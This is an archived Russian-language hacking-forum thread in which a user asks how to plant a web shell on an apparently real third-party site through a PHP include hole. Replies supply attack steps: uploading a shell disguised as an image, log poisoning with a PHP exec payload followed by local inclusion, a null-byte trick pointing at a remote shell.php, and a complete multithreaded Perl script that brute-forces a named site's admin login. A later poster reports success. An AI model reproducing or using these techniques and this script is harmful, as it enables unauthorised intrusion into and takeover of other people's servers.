ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
27.01.2009, 21:21
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Инклюд )
Вообщем нашел сайтег.... довольно популярный... там php инклюдинг... При вводе несуществующей страницы вылитает
Код:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /hosting/www/main/samp/v2/index.php on line 369
Warning: include(http://someweb.com/shell.php) [function.include]: failed to open stream: no suitable wrapper could be found in /hosting/www/main/samp/v2/index.php on line 369
Warning: include() [function.include]: Failed opening 'http://someweb.com/shell.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /hosting/www/main/samp/v2/index.php on line 369
Инклюд типа
Код:
someweb.ru/v2/index.php?page=http://someweb.com/shell&lang=ru&PHPSESSID=0548fe13c6b6c63e4bbd59538e1c77da
Есть какие либо варианты как залить шелл ? |
|
|
27.01.2009, 21:37
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Удаленный инклюд запрещен, попробуй залить шелл, к примеру, как картинку, и проинклюдь его.
ps: _http://www.dyc.lv ? 
Последний раз редактировалось oRb; 27.01.2009 в 21:39..
|
|
|
|
27.01.2009, 21:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
попробуй залить через логи,
только учти попытка будет всего одна 
а потом проведи локальный инклуд. |
|
|
|
27.01.2009, 21:51
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от geezer.code
попробуй залить через логи,
только учти попытка будет всего одна
а потом проведи локальный инклуд. Эт как ? :P Что ты имееш в виду ?
|
|
|
|
27.01.2009, 21:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
например делаешь запрос к существующей странице
www.site.com/index.php?myadd=<?php exec($_GET['cmd']) ?>
этот запрос должен попасть в access.log
после этого нужно этот аксес-лог проинклудить.
и по идее утебя получится мини шелл... после этого можешь уже загрузить чтото посущественнее.
|
|
|
|
27.01.2009, 21:59
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
...или пробрути (perl; в password.txt пароли):
PHP код:
#! /usr/bin/perl -w
use IO::Socket;
use warnings;
use threads;
use threads::shared;
use Fcntl ':flock';
print "
simple brute
by eLwaux
\n";
my $threads = 10;
my $host = 'dyc.lv';
my $login = 'http://www.dyc.lv/v2/admins.php';
open (FILE, '<password.txt') || die(" [-] icqmailc.com.pass.txt not found!\n");
my @pas : shared = <FILE>;
chomp(@pas);
close(FILE);
$time = time;
printf " [ ] started [".localtime()."]\n\n";
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
$time = time-$time;
printf "\n [ ] finished [".localtime()."]\n";
printf " [i] time elapsed: $time sec\n";
<stdin>;
sub Brut{
while(@pas)
{
{lock(@pas);$pasw = shift @pas;}
$post = 'parole='.$pasw;
$header =
"POST ".$login." HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"User-Agent: mde\r\n".
"Referer: ".$login."\r\n".
"Cookie: hello=world;\r\n".
"Content-Length: ".length($post)."\r\n\r\n".
"$post\r\n\r\n";
my $sock = sock();
print $sock $header;
my $answ;
while(my $answer = <$sock>){$answ.=$answer;}
if (length($answ)==947) {print ' - ';}
else {print ' +++++++++++ ';}
print $pasw."\n";
close($sock);
}
}
#create new socket connection
sub sock {
my $sock;
do {
$sock = new IO::Socket::INET
(
PeerAddr => $host,
PeerPort => 80,
PeerProto => 'tcp',
TimeOut => 10
) or print "[-] connection error!";
} while (!$sock);
return $sock;
}
|
|
|
|
27.01.2009, 22:02
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Да в том то и прикол что он после названия добавляет еще и .php
|
|
|
|
27.01.2009, 22:06
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
%00
?cmd=http://site.ua/shell.php?
|
|
|
|
05.03.2009, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
УРА! Спасибо у меня получилось.
Скрин:
А у вас?
Последний раз редактировалось Daboy; 05.03.2009 в 00:23..
|
|
|
|
05.03.2009, 00:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сбрутил что ли? о_0
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
инклюд под виндой
|
oes |
Уязвимости |
9 |
07.12.2008 17:13 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
